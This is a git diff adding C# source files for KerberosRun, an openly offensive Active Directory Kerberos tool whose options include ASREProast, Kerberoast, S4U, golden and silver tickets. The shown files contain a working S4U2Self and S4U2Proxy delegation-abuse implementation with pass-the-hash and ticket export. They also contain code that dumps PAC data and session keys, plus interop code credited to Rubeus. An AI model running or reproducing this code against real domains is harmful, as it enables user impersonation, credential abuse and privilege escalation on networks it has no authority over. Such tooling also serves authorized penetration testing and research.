+                Console.WriteLine("                   - ProfilePath :  {0}", pac.LogonInfo.ProfilePath);
+                Console.WriteLine("                   - PwdCanChangeTime :  {0}", pac.LogonInfo.PwdCanChangeTime);
+                Console.WriteLine("                   - PwdLastChangeTime :  {0}", pac.LogonInfo.PwdLastChangeTime);
+                Console.WriteLine("                   - PwdMustChangeTime :  {0}", pac.LogonInfo.PwdMustChangeTime);
+                Console.WriteLine("                   - Reserved1 :  {0}", String.Join(", ", pac.LogonInfo.Reserved1.ToArray().Select(x=> x.ToString())));
+                Console.WriteLine("                   - Reserved3 :  {0}", pac.LogonInfo.Reserved3);
+                Console.WriteLine("                   - ResourceDomainId :  {0}", pac.LogonInfo.ResourceDomainId);
+                Console.WriteLine("                   - ResourceDomainSid :  {0}", pac.LogonInfo.ResourceDomainSid);
+                Console.WriteLine("                   - ResourceGroupCount :  {0}", pac.LogonInfo.ResourceGroupCount);
+                Console.WriteLine("                   - ResourceGroupIds :  {0}", pac.LogonInfo.ResourceGroupIds);
+
+                Console.WriteLine("                   - ResourceGroups : ");
+                if (pac.LogonInfo.ResourceGroups != null)
+                {
+                    foreach (var resourceGroup in pac.LogonInfo.ResourceGroups)
+                    {
+                        Console.WriteLine("                      - Attributes :  {0}", resourceGroup.Attributes);
+                        Console.WriteLine("                      - Id :  {0}", resourceGroup.Id);
+                        Console.WriteLine("                      - Value :  {0}", resourceGroup.Value);
+                    }
+                }
+               
+
+                
+                Console.WriteLine("                   - SubAuthStatus :  {0}", pac.LogonInfo.SubAuthStatus);
+                Console.WriteLine("                   - UserAccountControl :  {0}", pac.LogonInfo.UserAccountControl);
+                Console.WriteLine("                   - UserDisplayName :  {0}", pac.LogonInfo.UserDisplayName);
+                Console.WriteLine("                   - UserFlags :  {0}", pac.LogonInfo.UserFlags);
+                Console.WriteLine("                   - UserId :  {0}", pac.LogonInfo.UserId);
+                Console.WriteLine("                   - UserName :  {0}", pac.LogonInfo.UserName);
+                Console.WriteLine("                   - UserSessionKey :  {0}", (BitConverter.ToString(pac.LogonInfo.UserSessionKey.ToArray())).Replace("-",""));
+                Console.WriteLine("                   - UserSid :  {0}", pac.LogonInfo.UserSid);
+                Console.WriteLine("                   - DomainName :  {0}", pac.LogonInfo.DomainName);
+                Console.WriteLine("                   - ServerName :  {0}", pac.LogonInfo.ServerName);
+                Console.WriteLine("                   - BadPasswordCount :  {0}", pac.LogonInfo.BadPasswordCount);
+                Console.WriteLine("                   - FailedILogonCount :  {0}", pac.LogonInfo.FailedILogonCount);
+                
+            }
+            
+
+
+
+            //DelegationInformation
+            if (pac.DelegationInformation != null)
+            {
+                Console.WriteLine("                - {0} :  ", pac.DelegationInformation.PacType);
+                Console.WriteLine("                   - S4U2ProxyTarget :  {0}", pac.DelegationInformation.S4U2ProxyTarget.Buffer);
+                Console.WriteLine("                   - S4UTransitedServices :  {0}", pac.DelegationInformation.S4UTransitedServices);
+            }
+
+
+
+            //ClientInformation
+            if (pac.ClientInformation != null)
+            {
+                Console.WriteLine("                - ClientInformation :  ");
+                Console.WriteLine("                   - PacType :  {0}", pac.ClientInformation.PacType);
+                Console.WriteLine("                   - ClientId :  {0}", pac.ClientInformation.ClientId);
+                Console.WriteLine("                   - Name :  {0}", pac.ClientInformation.Name);
+                Console.WriteLine("                   - NameLength :  {0}", pac.ClientInformation.NameLength);
+            }
+
+
+
+            //KdcSignature
+            if (pac.KdcSignature != null)
+            {
+                Console.WriteLine("                - KdcSignature :  ");
+                Console.WriteLine("                   - PacType :  {0}", pac.KdcSignature.PacType);
+                Console.WriteLine("                   - RODCIdentifier :  {0}", pac.KdcSignature.RODCIdentifier);
+                Console.WriteLine("                   - Signature :  {0}", (BitConverter.ToString(pac.KdcSignature.Signature.ToArray())).Replace("-", ""));
+                Console.WriteLine("                   - SignatureData :  [...]" );//pac.KdcSignature.SignatureData);
+                Console.WriteLine("                   - Type :  {0}", pac.KdcSignature.Type);
+                Console.WriteLine("                   - Validated :  {0}", pac.KdcSignature.Validated);
+                Console.WriteLine("                   - Validator :  ");
+                Console.WriteLine("                      - Validator :  {0}", pac.KdcSignature.Validator.Usage);
+                Console.WriteLine("                      - Validator :  {0}", (BitConverter.ToString(pac.KdcSignature.Validator.Signature.ToArray())).Replace("-",""));
+            }
+
+
+            //ServerSignature
+            if (pac.ServerSignature != null)
+            {
+                Console.WriteLine("                - ServerSignature :  ");
+                Console.WriteLine("                   - PacType :  {0}", pac.ServerSignature.PacType);
+                Console.WriteLine("                   - RODCIdentifier :  {0}", pac.ServerSignature.RODCIdentifier);
+                Console.WriteLine("                   - Signature :  {0}", (BitConverter.ToString(pac.ServerSignature.Signature.ToArray())).Replace("-", ""));
+                Console.WriteLine("                   - SignatureData :  [...]");//pac.ServerSignature.SignatureData);
+                Console.WriteLine("                   - Type :  {0}", pac.ServerSignature.Type);
+                Console.WriteLine("                   - Validated :  {0}", pac.ServerSignature.Validated);
+                Console.WriteLine("                   - Validator :  ");
+                Console.WriteLine("                      - Validator :  {0}", pac.ServerSignature.Validator.Usage);
+                Console.WriteLine("                      - Validator :  {0}", (BitConverter.ToString(pac.ServerSignature.Validator.Signature.ToArray())).Replace("-", ""));
+            }
+
+
+
+            //ClientClaims
+            if (pac.ClientClaims != null)
+            {
+                Console.WriteLine("                - ClientClaims :  ");
+                Console.WriteLine("                   - PacType :  {0}", pac.ClientClaims.PacType);
+                Console.WriteLine("                   - ClaimSetSize :  {0}", pac.ClientClaims.ClaimSetSize);
+                Console.WriteLine("                   - ClaimsSet :  {0}", pac.ClientClaims.ClaimsSet);
+                Console.WriteLine("                   - CompressionFormat :  {0}", pac.ClientClaims.CompressionFormat);
+                Console.WriteLine("                   - ReservedField :  {0}", pac.ClientClaims.ReservedField);
+                Console.WriteLine("                   - ReservedFieldSize :  {0}", pac.ClientClaims.ReservedFieldSize);
+                Console.WriteLine("                   - ReservedType :  {0}", pac.ClientClaims.ReservedType);
+                Console.WriteLine("                   - UncompressedClaimSetSize :  {0}", pac.ClientClaims.UncompressedClaimSetSize);
+            }
+
+
+            //CredentialType
+            if (pac.CredentialType != null)
+            {
+                Console.WriteLine("                - CredentialType :  ");
+                Console.WriteLine("                   - PacType :  {0}", pac.CredentialType.PacType);
+                Console.WriteLine("                   - EncryptionType :  {0}", pac.CredentialType.EncryptionType);
+                Console.WriteLine("                   - SerializedData :  {0}", pac.CredentialType.SerializedData);
+                Console.WriteLine("                   - Version :  {0}", pac.CredentialType.Version);
+            }
+
+
+            //DeviceClaims
+            if (pac.DeviceClaims != null)
+            {
+                Console.WriteLine("                - DeviceClaims :  ");
+                Console.WriteLine("                   - PacType :  {0}", pac.DeviceClaims.PacType);
+                Console.WriteLine("                   - ReservedType :  {0}", pac.DeviceClaims.ReservedType);
+                Console.WriteLine("                   - ReservedField :  {0}", pac.DeviceClaims.ReservedField);
+                Console.WriteLine("                   - ReservedFieldSize :  {0}", pac.DeviceClaims.ReservedFieldSize);
+                Console.WriteLine("                   - UncompressedClaimSetSize :  {0}", pac.DeviceClaims.UncompressedClaimSetSize);
+            }
+
+
+
+            //UpnDomainInformation
+            if (pac.UpnDomainInformation != null)
+            {
+                Console.WriteLine("                - UpnDomainInformation :  ");
+                Console.WriteLine("                   - PacType :  {0}", pac.UpnDomainInformation.PacType);
+                Console.WriteLine("                   - Upn :  {0}", pac.UpnDomainInformation.Upn);
+                Console.WriteLine("                   - UpnLength :  {0}", pac.UpnDomainInformation.UpnLength);
+                Console.WriteLine("                   - UpnOffset :  {0}", pac.UpnDomainInformation.UpnOffset);
+                Console.WriteLine("                   - Domain :  {0}", pac.UpnDomainInformation.Domain);
+                Console.WriteLine("                   - DnsDomainNameLength :  {0}", pac.UpnDomainInformation.DnsDomainNameLength);
+                Console.WriteLine("                   - DnsDomainNameOffset :  {0}", pac.UpnDomainInformation.DnsDomainNameOffset);
+            }
+
+
+
+
+            
+            //DecodingErrors
+            if (pac.DecodingErrors != null)
+            {
+                Console.WriteLine("                - DecodingErrors :  ");
+                foreach (var decodingError in pac.DecodingErrors)
+                {
+                    Console.WriteLine("                   - Type :  {0}", decodingError.Type);
+                    Console.WriteLine("                   - Exception :  {0}", decodingError.Exception);
+                    Console.WriteLine("                   - Data :  {0}", decodingError.Data);
+                }
+
+            }
+            //HasRequiredFields
+            Console.WriteLine("                - HasRequiredFields :  {0}", pac.HasRequiredFields);
+
+
+        }
+
+
+
+
+        public static void PrintKirbi(string kirbiString)
+        {
+            byte[] kirbiBytes = Convert.FromBase64String(kirbiString);
+
+
+            //KRB-CRED         ::= [APPLICATION 22]   SEQUENCE {
+            //pvno[0]                INTEGER,
+            //msg - type[1]            INTEGER, --KRB_CRED
+            //tickets[2]             SEQUENCE OF Ticket,
+            //enc - part[3]            EncryptedData
+            //}
+            var myCred = KrbCred.DecodeApplication(kirbiBytes.AsMemory());
+            Console.WriteLine("    * {0}", myCred.MessageType);
+            Console.WriteLine("    * pvno :  {0}", myCred.ProtocolVersionNumber);
+            Console.WriteLine("    * Tickets :  {0}", myCred.Tickets[0]);
+
+
+
+            //EncKrbCredPart   ::= [APPLICATION 29]   SEQUENCE {
+            //ticket-info[0]         SEQUENCE OF KrbCredInfo,
+            //nonce[1]               INTEGER OPTIONAL,
+            //timestamp[2]           KerberosTime OPTIONAL,
+            //usec[3]                INTEGER OPTIONAL,
+            //s-address[4]           HostAddress OPTIONAL,
+            //r-address[5]           HostAddress OPTIONAL
+            //}
+            var encryptedData = myCred.EncryptedPart;
+            var encCredPart = KrbEncKrbCredPart.DecodeApplication(encryptedData.Cipher);
+
+            Console.WriteLine("    * Encrypted Data :  ");
+            Console.WriteLine("       - Timestamp :  {0}", encCredPart.Timestamp);
+            Console.WriteLine("       - USec :  {0}", encCredPart.USec);
+            Console.WriteLine("       - SAddress : ");
+            if (encCredPart.SAddress != null)
+            {
+                Console.WriteLine("          - AddressType :  {0}", encCredPart.SAddress.AddressType);
+                Console.WriteLine("          - Address :  {0}", encCredPart.SAddress.Address);
+            }
+            Console.WriteLine("       - RAddress :  ");
+            if (encCredPart.RAddress != null)
+            {
+                Console.WriteLine("          - AddressType :  {0}", encCredPart.RAddress.AddressType);
+                Console.WriteLine("          - Address :  {0}", encCredPart.RAddress.Address);
+            }
+            Console.WriteLine("       - Nonce :  {0}", encCredPart.Nonce);
+
+
+            //KrbCredInfo::= SEQUENCE {
+            //                key[0]                 EncryptionKey,
+            //prealm[1]              Realm OPTIONAL,
+            //pname[2]               PrincipalName OPTIONAL,
+            //flags[3]               TicketFlags OPTIONAL,
+            //authtime[4]            KerberosTime OPTIONAL,
+            //starttime[5]           KerberosTime OPTIONAL,
+            //endtime[6]             KerberosTime OPTIONAL
+            //renew - till[7]          KerberosTime OPTIONAL,
+            //srealm[8]              Realm OPTIONAL,
+            //sname[9]               PrincipalName OPTIONAL,
+            //caddr[10]              HostAddresses OPTIONAL
+            //}
+            Console.WriteLine("       - Ticket Info : ");
+            var ticketInfo = encCredPart.TicketInfo;
+            foreach (var info in ticketInfo)
+            {
+                Console.WriteLine("          - Realm :  {0}", info.Realm);
+                Console.WriteLine("          - PName :  ");
+                Console.WriteLine("             - Type :  {0}", info.PName.Type);
+                Console.WriteLine("             - Name :  {0}", info.PName.Name);
+                Console.WriteLine("          - Flags :  {0}", info.Flags);
+                Console.WriteLine("          - AuthTime :  {0}", info.AuthTime);
+                Console.WriteLine("          - StartTime :  {0}", info.StartTime);
+                Console.WriteLine("          - EndTime :  {0}", info.EndTime);
+                Console.WriteLine("          - RenewTill :  {0}", info.RenewTill);
+                Console.WriteLine("          - SRealm :  {0}", info.SRealm);
+                Console.WriteLine("          - SName :  ");
+                Console.WriteLine("             - Type :  {0}", info.SName.Type);
+                Console.WriteLine("             - Name :  {0}", info.SName.Name);
+                Console.WriteLine("          - Key : ");
+                Console.WriteLine("             - EType :  {0}", info.Key.EType);
+                Console.WriteLine("             - KeyValue :  {0}", (BitConverter.ToString(info.Key.KeyValue.ToArray())).Replace("-", ""));
+            }
+
+        }
+
+
+    }
+}
diff --git a/KerberosRun/KerberosRun/Program.cs b/KerberosRun/KerberosRun/Program.cs
new file mode 100644
index 0000000..424cbf8
--- /dev/null
+++ b/KerberosRun/KerberosRun/Program.cs
@@ -0,0 +1,36 @@
+using System;
+using CommandLine;
+
+namespace KerberosRun
+{
+    class MainClass
+    {
+
+        public static async System.Threading.Tasks.Task Main(string[] args)
+        {
+
+            PrintFunc.PrintBanner();
+            
+            var options = new Options();
+            if (!Parser.Default.ParseArguments(args, options)) { return; }
+            if (options.Ticket == null & options.Asreproast == false & options.Kerberoast == false 
+                & options.AskTGS == false & options.AskTGT == false & options.S4U == false
+                & options.S4U2Self == false & options.Golden == false & options.Sliver == false)
+            {
+                Console.WriteLine(options.GetHelp());
+                Environment.Exit(0);
+            }
+
+            await Commands.ResolveCmd(options);
+
+            Console.WriteLine();
+            
+        }
+
+
+
+    }
+
+}
+
+
diff --git a/KerberosRun/KerberosRun/Properties/AssemblyInfo.cs b/KerberosRun/KerberosRun/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..5f0cc39
--- /dev/null
+++ b/KerberosRun/KerberosRun/Properties/AssemblyInfo.cs
@@ -0,0 +1,26 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+
+// Information about this assembly is defined by the following attributes. 
+// Change them to the values specific to your project.
+
+[assembly: AssemblyTitle("KerberosRun")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCopyright("${AuthorCopyright}")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// The assembly version has the format "{Major}.{Minor}.{Build}.{Revision}".
+// The form "{Major}.{Minor}.*" will automatically update the build and revision,
+// and "{Major}.{Minor}.{Build}.*" will update just the revision.
+
+[assembly: AssemblyVersion("1.0.*")]
+
+// The following attributes are used to specify the signing key for the assembly, 
+// if desired. See the Mono documentation for more information about signing.
+
+//[assembly: AssemblyDelaySign(false)]
+//[assembly: AssemblyKeyFile("")]
diff --git a/KerberosRun/KerberosRun/S4U.cs b/KerberosRun/KerberosRun/S4U.cs
new file mode 100644
index 0000000..4c36f92
--- /dev/null
+++ b/KerberosRun/KerberosRun/S4U.cs
@@ -0,0 +1,545 @@
+using System;
+using Kerberos.NET.Credentials;
+using Kerberos.NET.Crypto;
+using Kerberos.NET.Entities;
+using System.Threading;
+using Kerberos.NET.Transport;
+using Microsoft.Extensions.Logging;
+using Kerberos.NET;
+using System.Collections.Generic;
+using System.Linq;
+
+namespace KerberosRun
+{
+    class S4U
+    {
+        private static KerberosKey credKey;
+        //S4U2Self
+        public static async System.Threading.Tasks.Task<KrbTgsRep> S4U2Self(string kdc,
+            ILoggerFactory logger,
+            TcpKerberosTransport transport,
+            KrbAsRep asRep,
+            string username,
+            string password,
+            string domainName,
+            string impersonateuser,
+            bool outKirbi = false,
+            bool verbose = false,
+            bool ptt = false,
+            string hash = null,
+            EncryptionType etype = EncryptionType.RC4_HMAC_NT)
+        {
+            var now = DateTime.UtcNow;
+
+            credKey = password != null ?
+                new KerberosPasswordCredential(username, password, domainName).CreateKey() :
+                new Utils.KerberosHashCreds(username, hash, etype, domainName).CreateKey();
+
+
+            KrbEncAsRepPart asDecrypted = password != null ?
+                new KerberosPasswordCredential(username, password, domainName).DecryptKdcRep(
+                asRep,
+                KeyUsage.EncAsRepPart,
+                d => KrbEncAsRepPart.DecodeApplication(d)) :
+                new Utils.KerberosHashCreds(username, hash, etype, domainName).DecryptKdcRep(
+                          asRep,
+                          KeyUsage.EncAsRepPart,
+                          d => KrbEncAsRepPart.DecodeApplication(d));
+
+            var sessionKey = asDecrypted.Key;
+
+
+            //Request Service Ticket parameters
+
+            ApOptions apOptions = ApOptions.Reserved;
+            KdcOptions kdcOptions =
+            KdcOptions.Forwardable |
+            KdcOptions.Renewable |
+            KdcOptions.RenewableOk;
+            string s4u = impersonateuser;
+            KrbTicket s4uTicket = null;
+            KrbTicket u2uServerTicket = null;
+
+
+            var rst = new RequestServiceTicket()
+            {
+                ApOptions = apOptions,
+                S4uTarget = s4u,
+                S4uTicket = s4uTicket,
+                UserToUserTicket = u2uServerTicket,
+                KdcOptions = kdcOptions,
+                Realm = domainName,
+            };
+
+            var tgt = asRep.Ticket;
+
+            var additionalTickets = new List<KrbTicket>();
+
+            if (rst.KdcOptions.HasFlag(KdcOptions.EncTktInSkey) && rst.UserToUserTicket != null)
+            {
+                additionalTickets.Add(rst.UserToUserTicket);
+            }
+            if (!string.IsNullOrWhiteSpace(rst.S4uTarget))
+            {
+                rst.KdcOptions |= KdcOptions.EncTktInSkey;
+            }
+            if (rst.S4uTicket != null)
+            {
+                rst.KdcOptions |= KdcOptions.ConstrainedDelegation;
+
+                additionalTickets.Add(rst.S4uTicket);
+            }
+
+
+
+            //EncryptionType[] kdcReqEtype = { EncryptionType.RC4_HMAC_NT };
+
+            string[] name = { username };
+
+            var body = new KrbKdcReqBody
+            {
+                EType = KrbConstants.KerberosConstants.ETypes.ToArray(),
+                KdcOptions = rst.KdcOptions,
+                Nonce = KrbConstants.KerberosConstants.GetNonce(),
+                Realm = rst.Realm,
+                SName = new KrbPrincipalName()
+                {
+                    Type = PrincipalNameType.NT_PRINCIPAL,
+                    Name = name
+                },
+                Till = KrbConstants.KerberosConstants.EndOfTime,
+                CName = new KrbPrincipalName()
+                {
+                    Type = PrincipalNameType.NT_PRINCIPAL,
+                    Name = name
+                }
+            };
+
+
+            if (additionalTickets.Count > 0)
+            {
+                body.AdditionalTickets = additionalTickets.ToArray();
+            }
+
+            var bodyChecksum = KrbChecksum.Create(
+                body.Encode(),
+                sessionKey.AsKey(),
+                KeyUsage.PaTgsReqChecksum
+            );
+
+
+            //ApReq
+            //Authenticator
+            var authenticator = new KrbAuthenticator
+            {
+                CName = asRep.CName,
+                Realm = asRep.Ticket.Realm,
+                SequenceNumber = KrbConstants.KerberosConstants.GetNonce(),
+                Checksum = bodyChecksum,
+                CTime = now,
+                CuSec = now.Millisecond //new Random().Next(0, 999999)
+            };
+
+            var subSessionKey = KrbEncryptionKey.Generate(sessionKey.EType);
+
+            subSessionKey.Usage = KeyUsage.EncTgsRepPartSubSessionKey;
+            authenticator.Subkey = subSessionKey;
+
+            var encryptedAuthenticator = KrbEncryptedData.Encrypt(
+                authenticator.EncodeApplication(),
+                sessionKey.AsKey(),
+                KeyUsage.PaTgsReqAuthenticator
+            );
+
+
+            var apReq = new KrbApReq
+            {
+                Ticket = tgt,
+                ApOptions = apOptions,
+                Authenticator = encryptedAuthenticator
+            };
+
+
+
+            var paData = new List<KrbPaData>()
+            {
+                new KrbPaData
+                {
+                    Type = PaDataType.PA_TGS_REQ,
+                    Value = apReq.EncodeApplication()
+                }
+            };
+
+            if (!string.IsNullOrWhiteSpace(rst.S4uTarget))
+            {
+                var paS4u = new KrbPaForUser
+                {
+                    AuthPackage = "Kerberos",
+                    UserName = new KrbPrincipalName { Type = PrincipalNameType.NT_ENTERPRISE, Name = new[] { s4u } },
+                    UserRealm = tgt.Realm
+                };
+                paS4u.GenerateChecksum(sessionKey.AsKey());
+
+                paData.Add(new KrbPaData
+                {
+                    Type = PaDataType.PA_FOR_USER,
+                    Value = paS4u.Encode()
+                });
+            }
+
+            var tgs = new KrbTgsReq
+            {
+                PaData = paData.ToArray(),
+                Body = body
+            };
+
+
+
+            ReadOnlyMemory<byte> encodedTgs = tgs.EncodeApplication();
+
+
+            Console.WriteLine("[*] Sending TGS-REQ [S4U2Self] ...");
+            if (verbose) { PrintFunc.PrintReq(tgs, credKey, sessionKey.AsKey()); }
+            
+
+
+            CancellationToken cancellation = default;
+            cancellation.ThrowIfCancellationRequested();
+
+
+
+            KrbTgsRep tgsRep = null;
+
+
+
+
+            try
+            {
+                tgsRep = await transport.SendMessage<KrbTgsRep>(
+                rst.Realm,
+                encodedTgs,
+                cancellation
+                );
+            }
+            catch (KerberosProtocolException pex)
+            {
+                Console.WriteLine("[x] Kerberos Error: {0}", pex.Message);
+                Environment.Exit(0);
+            }
+
+
+            Console.WriteLine("[*] Receiving TGS-REP [S4U2Self] ...");
+            try
+            {
+                KrbEncTgsRepPart tgsDecryptedRepPart = tgsRep.EncPart.Decrypt<KrbEncTgsRepPart>(
+                subSessionKey.AsKey(),
+                KeyUsage.EncTgsRepPartSubSessionKey,
+                (ReadOnlyMemory<byte> t) => KrbEncTgsRepPart.DecodeApplication(t));
+
+
+                if (verbose)
+                {
+                    PrintFunc.PrintRep(tgsRep, credKey);
+
+                    Console.WriteLine("    * [Decrypted Enc-Part]:");
+                    PrintFunc.PrintRepEnc(tgsDecryptedRepPart, credKey);
+
+                    //=========================================
+
+                    //TGS-REQ Ticket Enc-Part
+                    KrbEncTicketPart ticketDecrypted = tgsRep.Ticket.EncryptedPart.Decrypt
+                        (credKey,
+                        KeyUsage.Ticket,
+                        (ReadOnlyMemory<byte> t) => KrbEncTicketPart.DecodeApplication(t));
+
+                    Console.WriteLine("    * [Decrypted Ticket Enc-Part]:");
+                    PrintFunc.PrintTicketEnc(ticketDecrypted);
+                    //=========================================
+                   
+                }
+
+                if (outKirbi)
+                {
+                    var kirbiTGS = Kirbi.toKirbi(tgsRep, tgsDecryptedRepPart, ptt);
+
+                    Console.WriteLine("[+] TGS Kirbi:");
+                    Console.WriteLine("    - {0}", Convert.ToBase64String(kirbiTGS));
+                }
+
+            }
+            catch (Exception e)
+            {
+                Console.WriteLine("[x] {0}", e.Message);
+            }
+            
+
+            
+
+            return tgsRep;
+
+
+        }
+
+
+        //S4U2Proxy
+        //[MS-SFU] 3.2.5.2.1.2 Using ServicesAllowedToSendForwardedTicketsTo
+        //The KDC checks if the security principal name(SPN) for Service 2, 
+        //identified in the sname and srealm fields of the KRB_TGS_REQ message, 
+        //is in the Service 1 account's ServicesAllowedToSendForwardedTicketsTo parameter. 
+        //If it is, then the KDC replies with a service ticket for Service 2. 
+        //Otherwise the KDC MUST return `KRB-ERR-BADOPTION`.
+        public static async System.Threading.Tasks.Task S4U2Proxy(string kdc,
+            ILoggerFactory logger,
+            TcpKerberosTransport transport,
+            KrbAsRep asRep,
+            KrbTgsRep s4u2self,
+            string username,
+            string password,
+            string domainName,
+            string impersonateuser,
+            string spn,
+            bool outKirbi = false,
+            bool verbose = false,
+            bool ptt = false,
+            string hash = null,
+            EncryptionType etype = EncryptionType.RC4_HMAC_NT)
+        {
+
+            var now = DateTime.UtcNow;
+
+            credKey = password != null ?
+                 new KerberosPasswordCredential(username, password, domainName).CreateKey() :
+                 new Utils.KerberosHashCreds(username, hash, etype, domainName).CreateKey();
+
+
+            KrbEncAsRepPart asDecrypted = password != null ?
+                new KerberosPasswordCredential(username, password, domainName).DecryptKdcRep(
+                asRep,
+                KeyUsage.EncAsRepPart,
+                d => KrbEncAsRepPart.DecodeApplication(d)) :
+                new Utils.KerberosHashCreds(username, hash, etype, domainName).DecryptKdcRep(
+                          asRep,
+                          KeyUsage.EncAsRepPart,
+                          d => KrbEncAsRepPart.DecodeApplication(d));
+
+            var sessionKey = asDecrypted.Key;
+
+
+            //Request Service Ticket parameters
+
+            ApOptions apOptions = ApOptions.Reserved;
+            KdcOptions kdcOptions =
+            KdcOptions.Forwardable |
+            KdcOptions.Renewable |
+            KdcOptions.RenewableOk;
+            string s4u = null;
+            KrbTicket s4uTicket = s4u2self.Ticket;
+            KrbTicket u2uServerTicket = null;
+
+
+
+            var rst = new RequestServiceTicket()
+            {
+                ServicePrincipalName = spn,
+                ApOptions = apOptions,
+                S4uTarget = s4u,
+                S4uTicket = s4uTicket,
+                UserToUserTicket = u2uServerTicket,
+                KdcOptions = kdcOptions,
+                Realm = domainName
+            };
+
+
+            var sname = rst.ServicePrincipalName.Split('/', '@');
+            var tgt = asRep.Ticket;
+
+            var additionalTickets = new List<KrbTicket>();
+
+            if (rst.KdcOptions.HasFlag(KdcOptions.EncTktInSkey) && rst.UserToUserTicket != null)
+            {
+                additionalTickets.Add(rst.UserToUserTicket);
+            }
+            if (!string.IsNullOrWhiteSpace(rst.S4uTarget))
+            {
+                rst.KdcOptions |= KdcOptions.Forwardable;
+            }
+            if (rst.S4uTicket != null)
+            {
+                rst.KdcOptions = rst.KdcOptions | KdcOptions.ConstrainedDelegation | KdcOptions.CNameInAdditionalTicket;
+
+                additionalTickets.Add(rst.S4uTicket);
+            }
+
+            //EncryptionType[] kdcReqEtype = { EncryptionType.RC4_HMAC_NT };
+            string[] name = { };
+            var body = new KrbKdcReqBody
+            {
+                EType = KrbConstants.KerberosConstants.ETypes.ToArray(),
+                KdcOptions = rst.KdcOptions,
+                Nonce = KrbConstants.KerberosConstants.GetNonce(),
+                Realm = rst.Realm,
+                SName = new KrbPrincipalName()
+                {
+                    Type = PrincipalNameType.NT_SRV_INST,
+                    Name = sname
+                },
+                Till = KrbConstants.KerberosConstants.EndOfTime,
+                CName = new KrbPrincipalName()
+                {
+                    Type = PrincipalNameType.NT_SRV_INST,
+                    Name = name
+                },
+            };
+
+            if (additionalTickets.Count > 0)
+            {
+                body.AdditionalTickets = additionalTickets.ToArray();
+            }
+
+            var bodyChecksum = KrbChecksum.Create(
+                body.Encode(),
+                sessionKey.AsKey(),
+                KeyUsage.PaTgsReqChecksum
+            );
+
+
+            //ApReq
+            //Authenticator
+            var authenticator = new KrbAuthenticator
+            {
+                CName = asRep.CName,
+                Realm = asRep.Ticket.Realm,
+                SequenceNumber = KrbConstants.KerberosConstants.GetNonce(),
+                Checksum = bodyChecksum,
+                CTime = now,
+                CuSec = now.Millisecond //new Random().Next(0, 999999)
+            };
+
+            var subSessionKey = KrbEncryptionKey.Generate(sessionKey.EType);
+
+            subSessionKey.Usage = KeyUsage.EncTgsRepPartSubSessionKey;
+            authenticator.Subkey = subSessionKey;
+
+            var encryptedAuthenticator = KrbEncryptedData.Encrypt(
+                authenticator.EncodeApplication(),
+                sessionKey.AsKey(),
+                KeyUsage.PaTgsReqAuthenticator
+            );
+
+            var apReq = new KrbApReq
+            {
+                Ticket = tgt,
+                ApOptions = apOptions,
+                Authenticator = encryptedAuthenticator
+            };
+
+
+            var pacOptions = new KrbPaPacOptions
+            {
+                Flags = PacOptions.ResourceBasedConstrainedDelegation
+            }.Encode();
+
+            var paData = new List<KrbPaData>()
+            {
+                new KrbPaData
+                {
+                    Type = PaDataType.PA_TGS_REQ,
+                    Value = apReq.EncodeApplication()
+                },
+                new KrbPaData
+                {
+                    Type = PaDataType.PA_PAC_OPTIONS,
+                    Value = pacOptions
+                }
+            };
+
+
+
+            if (!string.IsNullOrWhiteSpace(rst.S4uTarget))
+            {
+                var paS4u = new KrbPaForUser
+                {
+                    AuthPackage = "Kerberos",
+                    UserName = new KrbPrincipalName { Type = PrincipalNameType.NT_ENTERPRISE, Name = new[] { s4u } },
+                    UserRealm = tgt.Realm
+                };
+                paS4u.GenerateChecksum(subSessionKey.AsKey());
+
+                paData.Add(new KrbPaData
+                {
+                    Type = PaDataType.PA_FOR_USER,
+                    Value = paS4u.Encode()
+                });
+            }
+
+            var tgs = new KrbTgsReq
+            {
+                PaData = paData.ToArray(),
+                Body = body
+            };
+
+
+
+            ReadOnlyMemory<byte> encodedTgs = tgs.EncodeApplication();
+
+
+            Console.WriteLine("[*] Sending TGS-REQ [S4U2Proxy] ...");
+            if (verbose) { PrintFunc.PrintReq(tgs, credKey, sessionKey.AsKey()); }
+           
+
+
+            CancellationToken cancellation = default;
+            cancellation.ThrowIfCancellationRequested();
+
+
+
+            KrbTgsRep tgsRep = null;
+            try
+            {
+                tgsRep = await transport.SendMessage<KrbTgsRep>(
+                rst.Realm,
+                encodedTgs,
+                cancellation
+                );
+            }
+            catch (KerberosProtocolException pex)
+            {
+                Console.WriteLine("[x] Kerberos Error: {0}", pex.Message);
+                Environment.Exit(0);
+            }
+
+
+            Console.WriteLine("[*] Receiving TGS-REP [S4U2Proxy] ...");
+
+            try
+            {
+                KrbEncTgsRepPart tgsDecryptedRepPart = tgsRep.EncPart.Decrypt<KrbEncTgsRepPart>(
+               subSessionKey.AsKey(),
+               KeyUsage.EncTgsRepPartSubSessionKey,
+               (ReadOnlyMemory<byte> t) => KrbEncTgsRepPart.DecodeApplication(t));
+
+                if (verbose)
+                {
+                    PrintFunc.PrintRep(tgsRep, credKey);
+
+                    Console.WriteLine("    * [Decrypted Enc-Part]:");
+                    PrintFunc.PrintRepEnc(tgsDecryptedRepPart, credKey);
+                }
+
+                if (outKirbi)
+                {
+                    var kirbiTGS = Kirbi.toKirbi(tgsRep, tgsDecryptedRepPart, ptt);
+
+                    Console.WriteLine("[+] TGS Kirbi:");
+                    Console.WriteLine("    - {0}", Convert.ToBase64String(kirbiTGS));
+                }
+            }catch(Exception e)
+            {
+                Console.WriteLine("[x] {0}", e.Message);
+            }
+            
+            
+
+        }
+    }
+}
diff --git a/KerberosRun/KerberosRun/Utils/Interop.cs b/KerberosRun/KerberosRun/Utils/Interop.cs
new file mode 100644
index 0000000..824e9ac
--- /dev/null
+++ b/KerberosRun/KerberosRun/Utils/Interop.cs
@@ -0,0 +1,1318 @@
+//Taken from https://github.com/GhostPack/Rubeus/blob/master/Rubeus/lib/Interop.cs by harmj0y
+
+using System;
+using System.Runtime.InteropServices;
+
+namespace KerberosRun
+{
+    class Interop
+    {
+        public const int KRB_KEY_USAGE_AS_REQ_PA_ENC_TIMESTAMP = 1;
+        public const int KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3;
+        public const int KRB_KEY_USAGE_TGS_REQ_PA_AUTHENTICATOR = 7;
+        public const int KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8;
